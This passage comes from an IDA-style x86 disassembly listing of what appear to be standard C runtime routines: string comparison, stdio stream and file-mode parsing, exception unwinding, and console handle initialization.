; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407FD0 proc near ; CODE XREF: sub_403017+C�p
; sub_40B1FC+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40801C
loc_407FE0: ; CODE XREF: sub_407FD0+3C�j
; sub_407FD0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+3]
jnz short loc_408014
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_407FE0
mov edi, edi
loc_408010: ; CODE XREF: sub_407FD0+18�j
; sub_407FD0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_408014: ; CODE XREF: sub_407FD0+14�j
; sub_407FD0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_40801C: ; CODE XREF: sub_407FD0+E�j
test edx, 1
jz short loc_40803C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_408014
add ecx, 1
or al, al
jz short loc_408010
test edx, 2
jz short loc_407FE0
loc_40803C: ; CODE XREF: sub_407FD0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
add ecx, 2
jmp short loc_407FE0
sub_407FD0 endp
; =============== S U B R O U T I N E =======================================
sub_408058 proc near ; CODE XREF: sub_407B19+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_425FC4, eax
retn
sub_408058 endp
; =============== S U B R O U T I N E =======================================
sub_408062 proc near ; CODE XREF: sub_40304B+B�p
; sub_4036E0+8C�p ...
arg_0 = dword ptr 4
push dword_425FC4
call sub_405193
test eax, eax
pop ecx
jz short loc_408081
push [esp+arg_0]
call eax ; sub_41C209
test eax, eax
pop ecx
jz short loc_408081
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408081: ; CODE XREF: sub_408062+E�j
; sub_408062+19�j
xor eax, eax
retn
sub_408062 endp
; =============== S U B R O U T I N E =======================================
sub_408084 proc near ; CODE XREF: sub_4067D6+76�p
; sub_4067D6+82�p ...
mov eax, offset off_423950
retn
sub_408084 endp
; =============== S U B R O U T I N E =======================================
sub_40808A proc near ; DATA XREF: .rdata:0041D2C8�o
mov eax, dword_434DC0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40809E
mov eax, 200h
jmp short loc_4080A4
; ---------------------------------------------------------------------------
loc_40809E: ; CODE XREF: sub_40808A+B�j
cmp eax, esi
jge short loc_4080A9
mov eax, esi
loc_4080A4: ; CODE XREF: sub_40808A+12�j
mov dword_434DC0, eax
loc_4080A9: ; CODE XREF: sub_40808A+16�j
push 4
push eax
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov dword_433DA0, eax
jnz short loc_4080DA
push 4
push esi
mov dword_434DC0, esi
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov dword_433DA0, eax
jnz short loc_4080DA
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4080DA: ; CODE XREF: sub_40808A+30�j
; sub_40808A+49�j
xor edx, edx
mov ecx, offset off_423950
jmp short loc_4080E8
; ---------------------------------------------------------------------------
loc_4080E3: ; CODE XREF: sub_40808A+6D�j
mov eax, dword_433DA0
loc_4080E8: ; CODE XREF: sub_40808A+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_423BD0
jl short loc_4080E3
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_423960
push edi
loc_408104: ; CODE XREF: sub_40808A+AA�j
mov edi, edx
and edi, 1Fh
imul edi, 28h
mov eax, edx
sar eax, 5
mov eax, dword_433CA0[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_408128
cmp eax, esi
jz short loc_408128
test eax, eax
jnz short loc_40812A
loc_408128: ; CODE XREF: sub_40808A+94�j
; sub_40808A+98�j
mov [ecx], esi
loc_40812A: ; CODE XREF: sub_40808A+9C�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4239C0
jl short loc_408104
pop edi
xor eax, eax
pop esi
retn
sub_40808A endp
; =============== S U B R O U T I N E =======================================
sub_40813B proc near ; DATA XREF: .rdata:0041D2E4�o
call sub_408D58
cmp byte_425FB0, 0
jz short loc_40814E
call sub_40DFD3
loc_40814E: ; CODE XREF: sub_40813B+C�j
push dword_433DA0
call sub_403603
pop ecx
retn
sub_40813B endp
; =============== S U B R O U T I N E =======================================
sub_40815B proc near ; CODE XREF: sub_403207+4F�p
; sub_4034C4+50�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_40817F
cmp eax, offset dword_423BB0
ja short loc_40817F
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40817F: ; CODE XREF: sub_40815B+B�j
; sub_40815B+12�j
add eax, 20h
push eax
call ds:dword_41D168 ; RtlEnterCriticalSection
retn
sub_40815B endp
; =============== S U B R O U T I N E =======================================
sub_40818A proc near ; CODE XREF: sub_4084A1+66�p
; sub_408C7E+46�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40819E
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40819E: ; CODE XREF: sub_40818A+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D168 ; RtlEnterCriticalSection
retn
sub_40818A endp
; =============== S U B R O U T I N E =======================================
sub_4081AD proc near ; CODE XREF: sub_4031EA+3�p
; sub_40334C+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_4081D1
cmp eax, offset dword_423BB0
ja short loc_4081D1
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081D1: ; CODE XREF: sub_4081AD+B�j
; sub_4081AD+12�j
add eax, 20h
push eax
call ds:dword_41D16C ; RtlLeaveCriticalSection
retn
sub_4081AD endp
; =============== S U B R O U T I N E =======================================
sub_4081DC proc near ; CODE XREF: sub_4084A1+7D�p
; sub_408D20+9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4081F0
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081F0: ; CODE XREF: sub_4081DC+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D16C ; RtlLeaveCriticalSection
retn
sub_4081DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081FF proc near ; CODE XREF: sub_403130+9A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_426484
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jmp short loc_408220
; ---------------------------------------------------------------------------
loc_40821F: ; CODE XREF: sub_4081FF+24�j
inc esi
loc_408220: ; CODE XREF: sub_4081FF+1E�j
cmp byte ptr [esi], 20h
jz short loc_40821F
mov al, [esi]
cmp al, 61h
jz short loc_408264
cmp al, 72h
jz short loc_40825B
cmp al, 77h
jz short loc_408252
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_40849D
; ---------------------------------------------------------------------------
loc_408252: ; CODE XREF: sub_4081FF+32�j
mov [ebp+arg_4], 301h
jmp short loc_40826B
; ---------------------------------------------------------------------------
loc_40825B: ; CODE XREF: sub_4081FF+2E�j
or [ebp+var_4], 1
mov [ebp+arg_4], ebx
jmp short loc_40826F
; ---------------------------------------------------------------------------
loc_408264: ; CODE XREF: sub_4081FF+2A�j
mov [ebp+arg_4], 109h
loc_40826B: ; CODE XREF: sub_4081FF+5A�j
or [ebp+var_4], 2
loc_40826F: ; CODE XREF: sub_4081FF+63�j
xor ecx, ecx
inc ecx
inc esi
mov al, [esi]
cmp al, bl
push edi
jz loc_408437
mov edx, 80h
mov edi, 4000h
loc_408288: ; CODE XREF: sub_4081FF+1B6�j
cmp ecx, ebx
jz loc_4083BB
movsx eax, al
cmp eax, 53h
jg loc_40833E
jz loc_40832C
sub eax, 20h
jz loc_4083B0
sub eax, 0Bh
jz short loc_408306
dec eax
jz short loc_4082FA
sub eax, 18h
jz short loc_4082E7
sub eax, 0Ah
jz short loc_4082DF
sub eax, 4
jnz loc_408440
cmp [ebp+var_8], ebx
jnz loc_4083A5
or [ebp+arg_4], 10h
mov [ebp+var_8], 1
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082DF: ; CODE XREF: sub_4081FF+BC�j
or [ebp+arg_4], edx
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082E7: ; CODE XREF: sub_4081FF+B7�j
test byte ptr [ebp+arg_4], 40h
jnz loc_4083A5
or [ebp+arg_4], 40h
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_4081FF+B2�j
mov [ebp+var_10], 1
jmp loc_4083A5
; ---------------------------------------------------------------------------
loc_408306: ; CODE XREF: sub_4081FF+AF�j
test byte ptr [ebp+arg_4], 2
jnz loc_4083A5
mov eax, [ebp+arg_4]
and eax, 0FFFFFFFEh
or eax, 2
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 0FFFFFFFCh
or eax, edx
mov [ebp+var_4], eax
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_40832C: ; CODE XREF: sub_4081FF+9D�j
cmp [ebp+var_8], ebx
jnz short loc_4083A5
or [ebp+arg_4], 20h
mov [ebp+var_8], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_4081FF+97�j
sub eax, 54h
jz short loc_40839D
sub eax, 0Eh
jz short loc_40838C
dec eax
jz short loc_40837B
sub eax, 0Bh
jz short loc_408366
sub eax, 6
jnz loc_408440
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], edi
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_408366: ; CODE XREF: sub_4081FF+14F�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
and [ebp+var_4], 0FFFFBFFFh
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40837B: ; CODE XREF: sub_4081FF+14A�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
or [ebp+var_4], edi
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40838C: ; CODE XREF: sub_4081FF+147�j
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], 8000h
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40839D: ; CODE XREF: sub_4081FF+142�j
test word ptr [ebp+arg_4], 1000h
jz short loc_4083A9
loc_4083A5: ; CODE XREF: sub_4081FF+CA�j
; sub_4081FF+EC�j ...
xor ecx, ecx
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_4083A9: ; CODE XREF: sub_4081FF+1A4�j
or [ebp+arg_4], 1000h
loc_4083B0: ; CODE XREF: sub_4081FF+A6�j
; sub_4081FF+DB�j ...
inc esi
mov al, [esi]
cmp al, bl
jnz loc_408288
loc_4083BB: ; CODE XREF: sub_4081FF+8B�j
cmp [ebp+var_10], ebx
jz short loc_408437
jmp short loc_4083C3
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_4081FF+1C7�j
inc esi
loc_4083C3: ; CODE XREF: sub_4081FF+1C1�j
cmp byte ptr [esi], 20h
jz short loc_4083C2
push 4
push esi
push offset aCcs ; "ccs="
call sub_40EB30
add esp, 0Ch
test eax, eax
jnz short loc_408440
add esi, 4
push offset aUtf8 ; "UTF-8"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_4083FC
add esi, 5
or [ebp+arg_4], 40000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_4083FC: ; CODE XREF: sub_4081FF+1EF�j
push offset aUtf16le ; "UTF-16LE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408419
add esi, 8
or [ebp+arg_4], 20000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408419: ; CODE XREF: sub_4081FF+20C�j
push offset aUnicode ; "UNICODE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408440
add esi, 7
or [ebp+arg_4], 10000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408436: ; CODE XREF: sub_4081FF+23B�j
inc esi
loc_408437: ; CODE XREF: sub_4081FF+79�j
; sub_4081FF+1BF�j ...
cmp byte ptr [esi], 20h
jz short loc_408436
cmp [esi], bl
jz short loc_40845A
loc_408440: ; CODE XREF: sub_4081FF+C1�j
; sub_4081FF+154�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp short loc_408478
; ---------------------------------------------------------------------------
loc_40845A: ; CODE XREF: sub_4081FF+23F�j
push 180h
push [ebp+arg_8]
lea eax, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_40E77C
add esp, 14h
test eax, eax
jz short loc_40847C
loc_408478: ; CODE XREF: sub_4081FF+259�j
xor eax, eax
jmp short loc_40849C
; ---------------------------------------------------------------------------
loc_40847C: ; CODE XREF: sub_4081FF+277�j
mov eax, [ebp+arg_C]
inc dword_425FC8
mov ecx, [ebp+var_4]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_10]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_40849C: ; CODE XREF: sub_4081FF+27B�j
pop edi
loc_40849D: ; CODE XREF: sub_4081FF+4E�j
pop esi
pop ebx
leave
retn
sub_4081FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084A1 proc near ; CODE XREF: sub_403130+54�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421538
call __SEH_prolog4
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4084C1: ; CODE XREF: sub_4084A1+85�j
mov [ebp+var_20], esi
cmp esi, dword_434DC0
jge loc_408591
mov eax, dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_40852C
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jnz short loc_408525
lea eax, [esi-3]
cmp eax, 10h
ja short loc_4084FE
lea eax, [esi+10h]
push eax
call sub_405934
pop ecx
test eax, eax
jz loc_408591
loc_4084FE: ; CODE XREF: sub_4084A1+49�j
mov eax, dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_40818A
pop ecx
pop ecx
mov eax, dword_433DA0
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_408528
push eax
push esi
call sub_4081DC
pop ecx
pop ecx
loc_408525: ; CODE XREF: sub_4084A1+41�j
inc esi
jmp short loc_4084C1
; ---------------------------------------------------------------------------
loc_408528: ; CODE XREF: sub_4084A1+79�j
mov edi, eax
jmp short loc_40858E
; ---------------------------------------------------------------------------
loc_40852C: ; CODE XREF: sub_4084A1+39�j
shl esi, 2
push 38h
call sub_40773A
pop ecx
mov ecx, dword_433DA0
mov [esi+ecx], eax
mov eax, dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_408591
push 0FA0h
mov eax, [eax]
add eax, 20h
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
mov eax, dword_433DA0
jnz short loc_408579
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, dword_433DA0
mov [esi+eax], ebx
jmp short loc_408591
; ---------------------------------------------------------------------------
loc_408579: ; CODE XREF: sub_4084A1+C3�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D168 ; RtlEnterCriticalSection
mov eax, dword_433DA0
mov edi, [esi+eax]
loc_40858E: ; CODE XREF: sub_4084A1+89�j
mov [ebp+var_1C], edi
loc_408591: ; CODE XREF: sub_4084A1+29�j
; sub_4084A1+57�j ...
cmp edi, ebx
jz short loc_4085A7
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_4085A7: ; CODE XREF: sub_4084A1+F2�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4085BE
mov eax, edi
call __SEH_epilog4
retn
sub_4084A1 endp
; =============== S U B R O U T I N E =======================================
sub_4085BB proc near ; DATA XREF: .rdata:00421550�o
mov edi, [ebp-1Ch]
sub_4085BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085BE proc near ; CODE XREF: sub_4084A1+10D�p
push 1
call sub_40591F
pop ecx
retn
sub_4085BE endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4085C8 proc near ; CODE XREF: sub_403130+8A�p
; sub_4085C8+BD�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_408658
push large dword ptr fs:0
mov eax, dword_423064
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_4085FA: ; CODE XREF: sub_4085C8+64�j
; sub_4085C8+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_40864A
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_40861C
cmp esi, edx
jbe short loc_40864A
loc_40861C: ; CODE XREF: sub_4085C8+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_4085FA
push 101h
mov eax, [ebx+8]
call sub_40EC5D
mov ecx, 1
mov eax, [ebx+8]
call sub_40EC7C
jmp short loc_4085FA
; ---------------------------------------------------------------------------
loc_40864A: ; CODE XREF: sub_4085C8+45�j
; sub_4085C8+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408658: ; DATA XREF: sub_4085C8+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40869D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_4085C8
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40869D: ; CODE XREF: sub_4085C8+A0�j
retn
sub_4085C8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_4086BA proc near ; CODE XREF: sub_406640+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_4086BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406640
loc_4086D1: ; CODE XREF: sub_406640+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40EC5D
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_406640
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086EA proc near ; CODE XREF: sub_406640+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_4086FF
push ecx
call sub_413976 ; RtlUnwind
loc_4086FF: ; DATA XREF: sub_4086EA+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4086EA endp
; =============== S U B R O U T I N E =======================================
sub_408704 proc near ; CODE XREF: sub_406640+137�p
; sub_406640+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 8
sub_408704 endp
; =============== S U B R O U T I N E =======================================
sub_40871B proc near ; CODE XREF: sub_403207+10E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_408A20
push eax
call sub_40D540
test eax, eax
pop ecx
pop ecx
jz short loc_4087AD
call sub_408084
add eax, 20h
cmp esi, eax
jnz short loc_408742
xor eax, eax
jmp short loc_408751
; ---------------------------------------------------------------------------
loc_408742: ; CODE XREF: sub_40871B+21�j
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_4087AD
xor eax, eax
inc eax
loc_408751: ; CODE XREF: sub_40871B+25�j
inc dword_425FC8
test word ptr [esi+0Ch], 10Ch
jnz short loc_4087AD
push ebx
push edi
lea edi, ds:425FCCh[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_408792
push ebx
call sub_40773A
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_408792
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_40879F
; ---------------------------------------------------------------------------
loc_408792: ; CODE XREF: sub_40871B+55�j
; sub_40871B+62�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_40879F: ; CODE XREF: sub_40871B+75�j
or dword ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4087AD: ; CODE XREF: sub_40871B+15�j
; sub_40871B+31�j ...
xor eax, eax
pop esi
retn
sub_40871B endp
; =============== S U B R O U T I N E =======================================
sub_4087B1 proc near ; CODE XREF: sub_403207+128�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_4087DF
push esi
mov esi, [esp+4+arg_4]
test word ptr [esi+0Ch], 1000h
jz short loc_4087DE
push esi
call sub_408BDA
and dword ptr [esi+0Ch], 0FFFFEEFFh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4087DE: ; CODE XREF: sub_4087B1+12�j
pop esi
locret_4087DF: ; CODE XREF: sub_4087B1+5�j
retn
sub_4087B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087E0 proc near ; CODE XREF: .text:00404034�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_421558
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call ds:dword_41D1A8 ; GetStartupInfoA
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 28h
push 20h
pop esi
push esi
call sub_40777A
pop ecx
pop ecx
cmp eax, edi
jz loc_408A17
mov dword_433CA0, eax
mov dword_433C84, esi
lea ecx, [eax+500h]
jmp short loc_408853
; ---------------------------------------------------------------------------
loc_40882A: ; CODE XREF: sub_4087E0+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov ecx, dword_433CA0
add ecx, 500h
loc_408853: ; CODE XREF: sub_4087E0+48�j
cmp eax, ecx
jb short loc_40882A
cmp [ebp+var_32], di
jz loc_40895E
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_40895E
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_408882
mov edi, eax
loc_408882: ; CODE XREF: sub_4087E0+9E�j
xor esi, esi
inc esi
jmp short loc_4088D9
; ---------------------------------------------------------------------------
loc_408887: ; CODE XREF: sub_4087E0+FF�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
test eax, eax
jz short loc_4088E3
lea ecx, ds:433CA0h[esi*4]
mov [ecx], eax
add dword_433C84, 20h
lea edx, [eax+500h]
jmp short loc_4088D4
; ---------------------------------------------------------------------------
loc_4088AE: ; CODE XREF: sub_4087E0+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov edx, [ecx]
add edx, 500h
loc_4088D4: ; CODE XREF: sub_4087E0+CC�j
cmp eax, edx
jb short loc_4088AE
inc esi
loc_4088D9: ; CODE XREF: sub_4087E0+A5�j
cmp dword_433C84, edi
jl short loc_408887
jmp short loc_4088E9
; ---------------------------------------------------------------------------
loc_4088E3: ; CODE XREF: sub_4087E0+B4�j
mov edi, dword_433C84
loc_4088E9: ; CODE XREF: sub_4087E0+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_40895E
loc_4088F1: ; CODE XREF: sub_4087E0+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_408951
cmp ecx, 0FFFFFFFEh
jz short loc_408951
mov al, [ebx]
test al, 1
jz short loc_408951
test al, 8
jnz short loc_408915
push ecx
call ds:dword_41D148 ; GetFileType
test eax, eax
jz short loc_408951
loc_408915: ; CODE XREF: sub_4087E0+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 28h
add esi, dword_433CA0[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz loc_408A17
inc dword ptr [esi+8]
loc_408951: ; CODE XREF: sub_4087E0+119�j
; sub_4087E0+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_4088F1
loc_40895E: ; CODE XREF: sub_4087E0+7B�j
; sub_4087E0+86�j ...
xor ebx, ebx
loc_408960: ; CODE XREF: sub_4087E0+213�j
mov esi, ebx
imul esi, 28h
add esi, dword_433CA0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_40897D
cmp eax, 0FFFFFFFEh
jz short loc_40897D
or byte ptr [esi+4], 80h
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_40897D: ; CODE XREF: sub_4087E0+190�j
; sub_4087E0+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_40898A
push 0FFFFFFF6h
pop eax
jmp short loc_408994
; ---------------------------------------------------------------------------
loc_40898A: ; CODE XREF: sub_4087E0+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_408994: ; CODE XREF: sub_4087E0+1A8�j
push eax
call ds:dword_41D14C ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4089E5
test edi, edi
jz short loc_4089E5
push edi
call ds:dword_41D148 ; GetFileType
test eax, eax
jz short loc_4089E5
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_4089C3
or byte ptr [esi+4], 40h
jmp short loc_4089CC
; ---------------------------------------------------------------------------
loc_4089C3: ; CODE XREF: sub_4087E0+1DB�j
cmp eax, 3
jnz short loc_4089CC
or byte ptr [esi+4], 8
loc_4089CC: ; CODE XREF: sub_4087E0+1E1�j
; sub_4087E0+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz short loc_408A17
inc dword ptr [esi+8]
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_4089E5: ; CODE XREF: sub_4087E0+1C0�j
